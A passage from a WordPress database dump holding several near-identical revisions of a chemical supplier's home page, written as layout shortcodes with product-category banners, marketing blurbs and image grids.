span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="4" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="100" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="8" height="1-4"]\n\n[ux_banner height="500px" bg="4130" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="0"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 17:39:56', '2017-05-01 17:39:56', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4133, 2, '2017-05-01 17:43:16', '2017-05-01 17:43:16', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="5" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="100" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="7" height="1-4"]\n\n[ux_banner height="500px" bg="4130" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="30" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="larger" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 17:43:16', '2017-05-01 17:43:16', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4134, 2, '2017-05-01 17:46:10', '2017-05-01 17:46:10', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="5" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="31" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="7" height="1-4"]\n\n[ux_banner height="500px" bg="4130" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="30" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="larger" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 17:46:10', '2017-05-01 17:46:10', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4135, 2, '2017-05-01 18:28:22', '2017-05-01 18:28:22', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4130" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="30" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="larger" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="55" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 18:28:22', '2017-05-01 18:28:22', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4136, 2, '2017-05-01 18:29:43', '2017-05-01 18:29:43', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4130" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="30" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="larger" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="55" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image 